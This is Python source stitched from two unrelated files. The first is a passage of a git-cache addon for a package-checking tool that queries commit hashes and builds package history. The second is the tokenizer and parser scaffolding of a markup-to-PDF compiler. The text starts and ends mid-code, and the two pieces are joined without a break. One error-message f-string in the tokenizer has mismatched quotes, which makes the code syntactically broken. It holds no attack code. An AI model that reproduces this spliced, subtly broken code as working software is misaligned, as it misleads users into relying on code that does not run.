targets from staged changes', docs=""" Targets are determined using all staged changes for the git repo. Unstaged changes and untracked files are ignored by temporarily stashing them during the scanning process. """) def __init__(self, *args): super().__init__(*args) try: find_binary('git') except CommandNotFound: raise caches.CacheDisabled(self.cache) # mapping of repo locations to their corresponding git repo caches self._cached_repos = {} @jit_attr def _gitignore(self): """Load a repo's .gitignore and .git/info/exclude files for path matching.""" patterns = [] for path in ('.gitignore', '.git/info/exclude'): try: with open(pjoin(self.options.target_repo.location, path)) as f: patterns.extend(f) except (FileNotFoundError, IOError): pass if patterns: return PathSpec.from_lines('gitwildmatch', patterns) return None def gitignored(self, path): """Determine if a given path in a repository is matched by .gitignore settings.""" if self._gitignore is not None: if path.startswith(self.options.target_repo.location): repo_prefix_len = len(self.options.target_repo.location) + 1 path = path[repo_prefix_len:] return self._gitignore.match_file(path) return False @staticmethod def _get_commit_hash(path, commit='origin/HEAD'): """Retrieve a git repo's commit hash for a specific commit object.""" try: p = subprocess.run( ['git', 'rev-parse', commit], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, cwd=path, check=True, encoding='utf8') except subprocess.CalledProcessError: raise GitError(f'failed retrieving commit hash for git repo: {path!r}') return p.stdout.strip() @staticmethod def pkg_history(repo, commit_range, data=None, local=False, verbosity=-1): """Create or update historical package data for a given commit range.""" if data is None: data = {} seen = set() with base.ProgressManager(verbosity=verbosity) as progress: for pkg in GitRepoPkgs(repo.location, commit_range, local=local): atom = pkg.atom key = (atom, pkg.status) if key not in seen: seen.add(key) if local: commit = (atom.fullver, pkg.commit_time, pkg.commit, pkg.old) else: date = datetime.fromtimestamp(pkg.commit_time).strftime('%Y-%m-%d') progress(f'{repo} -- updating git cache: commit date: {date}') commit = (atom.fullver, pkg.commit_time, pkg.commit) data.setdefault(atom.category, {}).setdefault( atom.package, {}).setdefault(pkg.status, []).append(commit) return data def update_cache(self, force=False): """Update related cache and push updates to disk.""" for repo in self.options.target_repo.trees: try: commit = self._get_commit_hash(repo.location) except GitError: continue # initialize cache file location cache_file = self.cache_file(repo) git_cache = None cache_repo = True if not force: git_cache = self.load_cache(cache_file) if git_cache is None or commit != git_cache.commit: logger.debug('updating %s git repo cache to %s', repo, commit[:13]) if git_cache is None: data = {} commit_range = 'origin/HEAD' else: data = git_cache.data commit_range = f'{git_cache.commit}..origin/HEAD' try: self.pkg_history( repo, commit_range, data=data, verbosity=self.options.verbosity) except GitError as e: raise PkgcheckUserException(str(e)) git_cache = GitCache(data, self.cache, commit=commit) else: cache_repo = False if git_cache: self._cached_repos[repo.location] = git_cache # push repo to disk if it was created or updated if cache_repo: self.save_cache(git_cache, cache_file) def cached_repo(self, repo_cls): git_repos = [] for repo in self.options.target_repo.trees: git_cache = self._cached_repos.get(repo.location, {}) git_repos.append(repo_cls(git_cache, repo_id=f'{repo.repo_id}-history')) if len(git_repos) > 1: return multiplex.tree(*git_repos) return git_repos[0] def commits_repo(self, repo_cls): target_repo = self.options.target_repo data = {} try: origin = self._get_commit_hash(target_repo.location) head = self._get_commit_hash(target_repo.location, commit='HEAD') if origin != head: data = self.pkg_history(target_repo, 'origin/HEAD..HEAD', local=True) except GitError as e: raise PkgcheckUserException(str(e)) repo_id = f'{target_repo.repo_id}-commits' return repo_cls(data, repo_id=repo_id) def commits(self): target_repo = self.options.target_repo commits = () try: origin = self._get_commit_hash(target_repo.location) head = self._get_commit_hash(target_repo.location, commit='HEAD') if origin != head: commits = GitRepoCommits(target_repo.location, 'origin/HEAD..HEAD') except GitError as e: raise PkgcheckUserException(str(e)) return iter(commits)
""" This is the main file that holds the Tokenizer, Parser, and Interpreter that actually compile the PDF. """ import os.path as path import re import copy as _copy from decimal import Decimal from placer.placer import Placer from constants import CMND_CHARS, END_LINE_CHARS, ALIGNMENT, TT, TT_M, WHITE_SPACE_CHARS, NON_END_LINE_CHARS, PB_NUM_TABS, PB_NAME_SPACE, STD_FILE_ENDING, STD_LIB_FILE_NAME, OUT_TAB from tools import assure_decimal, is_escaped, is_escaping, exec_python, eval_python, string_with_arrows, trimmed, print_progress_bar, prog_bar_prefix, calc_prog_bar_refresh_rate, assert_instance from marked_up_text import MarkedUpText from markup import Markup, MarkupStart, MarkupEnd from toolbox import ToolBox from placer.placers.naiveplacer import NaivePlacer # ----------------------------------------------------------------------------- # Errors That Can Occur While Compiling class Error(Exception): def __init__(self, pos_start, pos_end, error_name, details): self.pos_start = pos_start self.pos_end = pos_end self.error_name = error_name self.details = details def as_string(self): result = f'Line {self.pos_start.ln + 1}, Column {self.pos_start.col + 1}, in file {self.pos_start.file_path}\n' result += f' {self.error_name} Occured: {self.details}' result += '\n' + string_with_arrows(self.pos_start.file_text, self.pos_start, self.pos_end) return result class ExpectedValidCmndNameError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Valid Command Name', details) class IllegalCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Illegal Character Error', details) class ExpectedCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Character Error', details) class InvalidSyntaxError(Error): def __init__(self, pos_start, pos_end, details=''): super().__init__(pos_start, pos_end, 'Invalid Syntax Error', details) class RunTimeError(Error): def __init__(self, pos_start, pos_end, details, context): super().__init__(pos_start, pos_end, 'Run-Time Error', details) self.context = context def generate_traceback(self): result = '' pos = self.pos_start ctx = self.context while ctx is not None: result = f' File {pos.file_path}, line {pos.ln + 1}, in {ctx.display_name}\n' + result pos = ctx.entry_pos ctx = ctx.parent return 'Traceback (most recent call last):\n' + result class PythonException(RunTimeError): def __init__(self, pos_start, pos_end, details, python_error, context): import traceback self.python_error = f'{python_error.exc_trace}' super().__init__(pos_start, pos_end, details, context) self.error_name = 'Python Exception' def as_string(self): string = super().as_string() string += '\nHere is the Python Exception:\n\n' string += f'{self.python_error}' return string # ----------------------------------------------------------------------------- # Position Class class Position: """ Position in a Tokenized file or a file that is being tokenized. """ __slots__ = ['idx', 'ln', 'col', 'file_path', 'file_text'] def __init__(self, idx, ln, col, file_path, file_text): self.idx = idx self.ln = ln self.col = col self.file_path = file_path # The path tot he file that this is a position in self.file_text = file_text # The text of the file this is a position in def advance(self, current_char=None): self.idx += 1 self.col += 1 if current_char in END_LINE_CHARS: self.ln += 1 self.col = 0 return self def copy(self): return Position(self.idx, self.ln, self.col, self.file_path, self.file_text) def __repr__(self): file = self.file_path.split('\\')[-1] return f"{self.__class__.__name__}(line {self.ln}, col {self.col}, in {file})" # ----------------------------------------------------------------------------- # File Class class File: __slots__ = ['file_path', 'raw_text', 'tokens', 'ast', 'import_context', 'import_tokens', 'being_run'] def __init__(self, file_path): self.file_path = file_path # Path to file # Fields set in Compiler._compiler_import_file self.raw_text = None # The raw text that is in the file self.tokens = None # The tokens that make up the File once it has been tokenized self.ast = None # The Abstract Syntax tree from the Tokens being Parsed # Fields set by Compiler._import_file self.import_context = None # The context obtained by running the file, can be used to import this file into another file self.import_tokens = None # The tokens to add to the token_document when the file is imported self.being_run = False # ----------------------------------------------------------------------------- # Token Class class Token: __slots__ = ['start_pos', 'end_pos', 'type', 'value', 'space_before'] def __init__(self, type, value, start_pos, end_pos=None, space_before=True): self.start_pos = start_pos if isinstance(space_before, bool): # Space before is whether there should be a space before the token # when it is put on the page. This is so that tokens like the # '=' and '{' that are singled out of a sentence can still tell # the placer whether there was space before them because the # default is to just put a space before each token is placed down. self.space_before = space_before else: self.space_before = (space_before in WHITE_SPACE_CHARS) if end_pos is None: end_pos = self.start_pos.copy() end_pos.advance() # Necessary if you want errors to display the errors correctly because they use start_pos - end_pos self.end_pos = end_pos else: self.end_pos = end_pos self.type = type self.value = str(value) if type == TT.WORD and value == '': raise Exception(f'An empty string has been made into a Token. This is a compiler problem. {self}') def matches(self, token_type, value): """ Checks if the given token_type and value matches this one. """ return self.type == token_type and self.value == value def copy(self): start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return Token(self.type, self.value, start_pos, end_pos, self.space_before) def gen_pass_2_python(self, locals): """ Generates a SecondPassPythonToken that can store the locals that should be provided when the python code is run in the Placer. The Placer already has the globals that should be provided. """ start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return SecondPassPythonToken(self.type, self.value, start_pos, end_pos, self.space_before, locals) def __repr__(self): """ This is what is called when you print this object since __str__ is undefined. """ return f"Token(\"<{self.type}>\":{" " if self.space_before else ""}{self.value})" class SecondPassPythonToken(Token): __slots__ = Token.__slots__[:] __slots__.extend(['locals']) def __init__(self, type, value, start_pos, end_pos=None, space_before=False, locals=None): super().__init__(type, value, start_pos, end_pos, space_before) self.locals = locals # ----------------------------------------------------------------------------- # Tokenizer Class class Tokenizer: """ Takes raw text and tokenizes it. """ def __init__(self, file_path, file_text, starting_position=None, print_progress_bar=False): super().__init__() self._print_progress_bar = print_progress_bar if starting_position: # Parse assuming that you are starting at the given line and column int he file self._pos = starting_position.copy() self._pos.idx = -1 else: # Parse assuming that you are starting at the beginning of the file self._pos = Position(-1, 0, -1, file_path, file_text) self._text = file_text self._current_char = None self._previous_char = '' self._plain_text = '' self._plain_text_start_pos = None self._space_before_plaintext = False self._unpaired_cbrackets = 0 self._unpaired_oparens = 0 self._tokens = [] self._advance() def _advance(self, num=1): """Advances to the next character in the text if it should advance.""" for i in range(num): self._previous_char = self._current_char self._pos.advance(self._current_char) self._current_char = self._text[self._pos.idx] if self._pos.idx < len(self._text) else None @staticmethod def plaintext_tokens_for_str(string, count_starting_space=False): """ If you want to write plaintext to the placer and the string to be interpreted only as plaintext, then this is what you use to tokenize the string. Just take the return-ed string from this method and give it to the place_text method of the Placer. If count_starting_space is True, then it will treat the whitespace before the first letter as actual space that could produce a paragraph break """ tokens = [] idx = -1 cc = None def next_tok(idx): idx += 1 return string[idx] if idx < len(string) else None, idx def try_append_word(curr_word, space_before): curr_word = re.sub('(\s)+', '', curr_word) if len(curr_word) > 0: tokens.append(Token(TT.WORD, curr_word, DUMMY_POSITION.copy(), space_before=space_before)) cc, idx = next_tok(idx) if not count_starting_space: # Eat all end line chars at beginning so no paragraph break at beginning while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) space_before = False curr_word = '' while cc is not None: if cc in NON_END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True while (cc is not None) and (cc in NON_END_LINE_CHARS): cc, idx, = next_tok(idx) continue elif cc in END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True if cc in END_LINE_CHARS: tokens.append(Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, DUMMY_POSITION.copy())) cc, idx = next_tok(idx) while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) continue else: curr_word += cc cc, idx = next_tok(idx) try_append_word(curr_word, space_before) return tokens @staticmethod def marked_up_text_for_tokens(list_of_tokens): """ Returns a MarkedUpText object that is equivalent to the List of Tokens given. """ text = MarkedUpText() curr_index = 0 pending_markups = [] for t in list_of_tokens: if isinstance(t, (MarkupStart, MarkupEnd)): text.add_markup_start_or_end(t, curr_index) elif isinstance(t, Token): if t.type == TT.PARAGRAPH_BREAK: # Add two newlines to signify a paragraph break text += '\n\n' curr_index += 2 elif t.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): markup = Markup() markup.add_python(t) text.add_markup(markup, curr_index) else: if t.space_before: text += ' ' curr_index += 1 text += t.value curr_index += len(t.value) else: raise Exception(f'{t} was in the list of tokens given to be changed into MarkedUpText, but MarkedUpText can\'t denote it. This is a compiler problem, tell the makers of the compiler that you got this error.') text_len = len(text) #print(f'curr_index = {curr_index}, text_len = {text_len}, markups = {None if text_len not in text._markups else text._markups[text_len]}') if text_len > 0 and text_len in text._markups: markups = text._markups.pop(text_len) index = text_len - 1 if index in text._markups: text._markups[index].extend(markups) else: text._markups[index] = markups #print(f'AFTER markups = {None if index not in text._markups else text._markups[index]}') return text @staticmethod def tokens_for_marked_up_text(marked_up_text): """ Returns a list of tokens for the given MarkedUpText. """ def try_token(token_value, token_list): if len(token_value) > 0: space_before = (token_value[0] in WHITE_SPACE_CHARS) tokens = Tokenizer.plaintext_tokens_for_str(str(token_value), True) token_value = '' if len(tokens) > 0: tokens[0].space_before = space_before token_list.extend(tokens) return token_value, token_list token_list = [] token_value = '' pending_end_markups = [] for i, char in enumerate(marked_up_text): markups = marked_up_text.markups_for_index(i) # markups is a list of MarkupStart and MarkupEnd objects or # None if there are None # Since Markups are inclusive of their index, the MarkupStarts must # be appended before the next char and the MarkupEnds must be # appended after the next character is added if markups: token_value, token_list = try_token(token_value, token_list) for markup in markups: if isinstance(markup, MarkupStart): token_list.append(markup) else: pending_end_markups.append(markup) token_value += char if pending_end_markups: token_value, token_list = try_token(token_value, token_list) for markup in pending_end_markups: token_list.append(markup) pending_end_markups = [] token_value, token_list = try_token(token_value, token_list) return token_list _what_can_be_escaped = {'{', '}', '=', '\\', '(', ')', ','} def tokenize(self, file=True): """ Turn the raw text into tokens that the compiler can use. If file is true, the tokenizer assumes that the text is from a file and bookends the tokens with TT.FILE_START and TT.FILE_END """ self._tokens = [] self._plain_text = '' what_can_be_escaped = self._what_can_be_escaped if file: self._tokens.append(Token(TT.FILE_START, '<FILE START>', self._pos.copy())) print_progress = self._print_progress_bar if print_progress: text_len = len(self._text) prefix = prog_bar_prefix('Tokenizing', self._pos.file_path) refresh = calc_prog_bar_refresh_rate(text_len) full_bar_printed = False if print_progress_bar(0, text_len, prefix): full_bar_printed = True # By default, all text is plain text until something says otherwise while self._current_char is not None: i = self._pos.idx if print_progress and (i % refresh) == 0: print_progress_bar(i, text_len, prefix) cc = self._current_char t = None if is_escaped(i, self._text, what_can_be_escaped): self._plain_text_char() elif is_escaping(i, self._text, what_can_be_escaped): self._advance() # Just advance because it is just escaping something else elif cc in END_LINE_CHARS: self._try_word_token() self._advance() pos_start = self._pos.copy() if self._current_char in END_LINE_CHARS: while self._current_char in END_LINE_CHARS: # Do nothing, just eat the END_LINE_CHARS now that we know that there is a PARAGRAPH_BREAK self._advance() t = Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, pos_start, self._pos.copy()) elif cc in NON_END_LINE_CHARS: self._try_word_token() self._advance() elif cc == '{': if self._unpaired_cbrackets == 0: self._first_unpaired_bracket_pos = self._pos.copy() self._unpaired_cbrackets += 1 t = Token(TT.OCBRACE, '{', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '}': self._unpaired_cbrackets -= 1 if self._unpaired_cbrackets < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing curly bracket "}". You need to add an open curly bracket "{" before it or escape it by putting a backslash before it.') t = Token(TT.CCBRACE, '}', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '=': t = Token(TT.EQUAL_SIGN, '=', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '(': if self._unpaired_oparens == 0: self._first_unpaired_oparens_pos = self._pos.copy() self._unpaired_oparens += 1 t = Token(TT.OPAREN, '(', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ')': self._unpaired_oparens -= 1 if self._unpaired_oparens < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing parenthesis ")". You need to add an open curly bracket "(" before it or escape it by putting a backslash before it.') t = Token(TT.CPAREN, ')', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ',': t = Token(TT.COMMA, ',', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '\\': t = self._tokenize_cntrl_seq() else: self._plain_text_char() if t is not None: # Actually append the Token (or list of tokens) if there is a Token to append self._try_word_token() if isinstance(t, Token): self._tokens.append(t) else: # t must be a list of tokens self._tokens.extend(t) if print_progress and not full_bar_printed: print_progress_bar(text_len, text_len, prefix) if self._unpaired_cbrackets > 0: raise InvalidSyntaxError(self._first_unpaired_bracket_pos.copy(), self._first_unpaired_bracket_pos.copy().advance(), f'{self._unpaired_cbrackets} unpaired, unescaped, opening curly bracket(s) '{' starting from this opening curly bracket. Either escape each one by putting a backslash before them or pair them with a closing curly bracket '}".') if self._unpaired_oparens > 0: raise InvalidSyntaxError(self._first_unpaired_oparens_pos.copy(), self._first_unpaired_oparens_pos.copy().advance(), f'{self._unpaired_oparens} unpaired, unescaped, opening parenthes(es) "(" starting from this open parenthes(es). Either escape each one by putting a backslash before them or pair them with a closing parenthesis ")".') self._try_word_token() if file: self._tokens.append(Token(TT.FILE_END, '<FILE END>', self._pos.copy())) return self._tokens # ------------------------------------------------------------------------- # Parsing Methods def _tokenize_cntrl_seq(self): """ Parse a control sequence. """ t = None pos_start = self._pos.copy() # NOTE: Multi-line matches tend be longer and so need to come before # single-line matches because shorter matches will match before longer # matches, even if the longer match would have worked had it been tried # Multiple Line Python ---------------------- if self._match(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_END, 1, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, use_eval=True) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_END, 2, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, use_eval=True) # One Line Python ----------------------- elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EXEC_END, 1, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, one_line=True, use_eval=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EXEC_END, 2, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, one_line=True, use_eval=True) # Comment ---------------------- elif self._match(TT_M.MULTI_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=False) elif self._match(TT_M.SINGLE_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=True) # Command -------------------------- else: # It is an identifier, so tokenize it t = self._tokenize_identifier() return t def _tokenize_python(self, end_codes, pass_num, pos_start, one_line=False, use_eval=False): """ Parses the string from self._pos as python code until one of the end_codes are reached. If one_line is true, that means that this python statement is supposed to only be one line so it cannot turn the rest of the file into python. """ python_str = '' pos_end = self._pos.copy() match_found = False while self._current_char is not None: if self._match(end_codes, False): # Only eat the chars if they are not in the END_LINE_CHARS. # Otherwise it is needed in order to determine whether to put # in a PARAGRAPH_BREAK if not self._current_char in END_LINE_CHARS: self._match(end_codes) match_found = True break else: # Since python has not ended yet, just add the given char to it python_str += self._current_char self._advance() if (self._current_char is None) and (not match_found) and (not one_line): raise InvalidSyntaxError(pos_start, pos_end, f'You made the rest of your file Python because there was no matching character sequence to end the Python section of your document denoted by this character sequence.') pos_end = self._pos.copy() if pass_num == 1: if use_eval: return Token(TT.EVAL_PYTH1, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH1, python_str, pos_start, pos_end) else: if use_eval: return Token(TT.EVAL_PYTH2, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH2, python_str, pos_start, pos_end) def _tokenize_comment(self, pos_start, one_line=False): """ Parses a comment, basically just eating any characters it finds until the comment is done. None of the characters are put into any Token, so the Parser will never even see them. """ pos_end = self._pos.copy() if one_line: # Its a one_line comment while self._current_char is not None: if self._match(TT_M.SINGLE_LINE_COMMENT_END): break else: self._advance() else: found_match = False # it's a continous comment, so parse until '<-%\' or '<-#\' is found while self._current_char is not None: if self._match(TT_M.MULTI_LINE_COMMENT_END): found_match = True break else: self._advance() if self._current_char is None and not found_match: raise InvalidSyntaxError(pos_start, pos_end, 'You commented out the rest of your file because there was no matching "<-%\\" or "<-#\\" to end the comment.') if len(self._tokens) > 0 and self._tokens[-1].type == TT.PARAGRAPH_BREAK: # Need to eat all end line white space now so that another # PARAGRAPH_BREAK cannot be produced due to this comment text being # ignored and there being white space before it. Two PARAGRAPH_BREAKs # next to eachother breaks all grammar rules and causes the Parser # to terminate early (i.e. before it reaches the FILE_END token) while self._current_char in END_LINE_CHARS: self._advance() def _tokenize_identifier(self): """ Tokenize an identifier like \\bold or \\i """ identifier_name = '' start_pos = self._pos.copy() space_before = self._previous_char #tokens = [] #tokens.append(Token(TT.BACKSLASH, '\\', start_pos.copy(), self._pos.copy(), space_before=space_before)) self._advance() # advance past '\\' problem_start = self._pos.copy() while self._current_char is not None: if self._current_char in CMND_CHARS: identifier_name += self._current_char self._advance() else: if len(identifier_name) == 0: raise ExpectedValidCmndNameError(problem_start, self._pos.copy(), f'All commands must specify a valid name with all characters of it in {CMND_CHARS}\n"{self._current_char}" is not one of the valid characters. You either forgot to designate a valid command name or forgot to escape the backslash before this character.') token = Token(TT.IDENTIFIER, identifier_name, start_pos.copy(), self._pos.copy(), space_before=space_before) return token # ------------------------------------------------------------------------- # Other Helper Methods def _try_word_token(self): """ Create a WORD token given what is in self._plain_text """ self._plain_text = re.sub('(\s)+', '', self._plain_text) if len(self._plain_text) > 0: self._tokens.append(Token(TT.WORD, self._plain_text, self._plain_text_start_pos, self._pos.copy(), space_before=self._space_before_plaintext)) self._space_before_plaintext = False self._plain_text = '' self._plain_text_start_pos = None def _plain_text_char(self): """ The current_char is a plain_text character """ if self._plain_text_start_pos is None: self._plain_text_start_pos = self._pos.copy() if self._pos.idx - 1 >= 0: self._space_before_plaintext = (self._text[self._pos.idx - 1] in WHITE_SPACE_CHARS) else: self._space_before_plaintext = False self._plain_text += self._current_char self._advance() def _match(self, matches:list, advance_past_on_match=True): """ Takes the given list of strings to match and sees if any of them match the text at the current index of the self._text This method does not look forward in the text for a match, just returns True if the string starting at the current index matches any of the matches. If advance_past_on_match, then if this method matches something, it will advance past the string it matched. """ index = self._pos.idx for str_to_match in matches: if ((index + len(str_to_match)) < len(self._text)) \ and (str_to_match == self._text[index:index + len(str_to_match)]): if advance_past_on_match: self._advance(len(str_to_match)) return True return False # ----------------------------------------------------------------------------- # Nodes for Parser DUMMY_POSITION = Position(0, 0, 0, 'Dummy File Name', 'Dummy File Text') class LeafNode: """ Base class for all Leaf Nodes (nodes that can only have one token) """ __slots__ = ['start_pos', 'end_pos'] def __init__(self, token): """ Takes a token and sets the start and end positions using it. Still must name the token in the actual node (i.e. self.writing, etc.) """ self.start_pos = token.start_pos self.end_pos = token.end_pos class FileNode: __slots__ = ['start_pos', 'end_pos', 'file_start', 'document', 'file_end'] def __init__(self, file_start, document, file_end): self.file_start = file_start # Token self.document = document # DocumentNode self.file_end = file_end # Token self.start_pos = file_start.start_pos self.end_pos = file_end.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.file_start}, {self.document}, {self.file_end})' class DocumentNode: __slots__ = ['start_pos', 'end_pos', 'starting_paragraph_break', 'paragraphs', 'ending_paragraph_break'] def __init__(self, paragraphs, starting_paragraph_break=None, ending_paragraph_break=None): self.starting_paragraph_break = starting_paragraph_break # Token self.paragraphs = paragraphs # List of ParagraphNodes self.ending_paragraph_break = ending_paragraph_break # Token if starting_paragraph_break: self.start_pos = starting_paragraph_break.start_pos elif len(paragraphs) > 0: self.start_pos = paragraphs[0].start_pos else: self.start_pos = DUMMY_POSITION.copy() if len(paragraphs) > 0: self.end_pos = paragraphs[-1].end_pos elif ending_paragraph_break: self.end_pos = ending_paragraph_break.end_pos elif starting_paragraph_break: self.end_pos = starting_paragraph_break.end_pos else: self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.paragraphs})' class ParagraphNode: __slots__ = ['start_pos', 'end_pos', 'writing', 'paragraph_break'] def __init__(self, paragraph_break, writing): self.paragraph_break = paragraph_break # Token self.writing = writing # WritingNode self.start_pos = writing.start_pos if paragraph_break: self.end_pos = paragraph_break.end_pos else: self.end_pos = writing.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class WritingNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['writing']) def __init__(self, writing): """ writing can be either a python node or a plain_text node. """ super().__init__(writing) self.writing = writing # PythonNode or PlainTextNode def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class PythonNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['python', 'python_string']) def __init__(self, python): """ python is a single python Token (PASS1EXEC|PASS2EXEC|PASS1EVAL|PASS2EVAL) """ super().__init__(python) self.python = python # one of the exec or eval Nodes self.python_string = None def __repr__(self): return f'{self.__class__.__name__}({self.python})' class CommandDefNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_params', 'cmnd_key_params', 'text_group'] def __init__(self, cmnd_name, cmnd_params, cmnd_key_params, text_group): self.start_pos = cmnd_name.start_pos self.end_pos = text_group.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_params = cmnd_params # list of CommandParamNodes self.cmnd_key_params = cmnd_key_params # list of CommandKeyParamNodes self.text_group = text_group # the text_group that the command will run def __repr__(self): cmnd_args = '' for i, arg in enumerate(self.cmnd_params): if i > 0: cmnd_args += ', ' cmnd_args += f'{arg}' return f'{self.__class__.__name__}({self.cmnd_name} = ({cmnd_args}) ' + '{' + f'{self.text_group}' + '}' + ')' class CommandParamNode: __slots__ = ['start_pos', 'end_pos', 'identifier'] def __init__(self, identifier): self.start_pos = identifier.start_pos self.end_pos = identifier.end_pos self.identifier = identifier # IDENTIFIER Token def __repr__(self): return f'{self.__class__.__name__}({self.identifier})' class CommandKeyParamNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # WORD Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandCallNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_tex_args', 'cmnd_key_args'] def __init__(self, cmnd_name, cmnd_tex_args, cmnd_key_args): self.start_pos = cmnd_name.start_pos self.end_pos = cmnd_name.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_tex_args = cmnd_tex_args # list of CommandTexArgNode self.cmnd_key_args = cmnd_key_args # dict of keyword:CommandArgNode pairs def __repr__(self): string = f'{self.__class__.__name__}(\\{self.cmnd_name}' # add args for arg in self.cmnd_tex_args: string += '{' + f'{arg}' + '}' # add kwargs for kwarg in self.cmnd_key_args: string += '{' + f'{kwarg.key}={kwarg.text_group}' + '}' # end string string += ')' return string class CommandTexArgNode: __slots__ = ['start_pos', 'end_pos', 'text_group'] def __init__(self, text_group): self.start_pos = text_group.start_pos self.end_pos = text_group.end_pos self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandKeyArgNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # IDENTIFIER Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.key}={self.text_group})' class TextGroupNode: __slots__ = ['start_pos', 'end_pos', 'ocbrace', 'document', 'ccbrace'] def __init__(self, ocbrace, document, ccbrace): self.start_pos = ocbrace.start_pos self.end_pos = ccbrace.end_pos self.ocbrace = ocbrace self.document = document self.ccbrace = ccbrace def __repr__(self): return f'{self.__class__.__name__}({self.document})' class PlainTextNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['plain_text']) def __init__(self, plain_text:list): """ plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens in any order. """ self.plain_text = plain_text # list of Tokens if len(plain_text) > 0: self.start_pos = plain_text[0].start_pos self.end_pos = plain_text[-1].end_pos else: self.start_pos = DUMMY_POSITION.copy() self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.plain_text})' # ----------------------------------------------------------------------------- # Parser Class and Related class ParseResult: """ A class that wraps results from the Parser because the parser will be trying out different things (is the next token plain text or a paragraph break? neither? then whats the next thing it could be?) and this ParseResult allows the Parser to try something and then undo that thing. An error can also can be returned if none of the things that were supposed to work actually work. """ __slots__ = ['error', 'node', 'last_registered_advance_count', 'advance_count', 'to_reverse_count', 'affinity'] def __init__(self): self.error = None self.node = None self.last_registered_advance_count = 0 self.advance_count = 0 self.to_reverse_count = 0 self.affinity = 0 def register_advancement(self): """ Registers that the Parser advanced a token so that that advancement can be undone later if need be. """ self.last_registered_advance_count = 1 self.advance_count += 1 def register(self, res): """ Registers a result, adding the error to this result if there was one and returning the node. """ self.last_registered_advance_count = res.advance_count self.advance_count += res.advance_count self.affinity += res.affinity if res.error: self.error = res.error return res.node def register_try(self, res): """ Returns None if the given result did not work and the Node of the result if it did. """ if res.error: self.affinity += res.affinity self.to_reverse_count = res.advance_count return None return self.register(res) def reversing(self): """ The last try is being reverse so set the to_reverse_count back to 0 and return what it was so that it can be reversed. """ to_reverse = self.to_reverse_count self.to_reverse_count = 0 return to_reverse def add_affinity(self, amt=1): """ Affinity is how far along the result was getting before it ran into an error. This is useful for when there 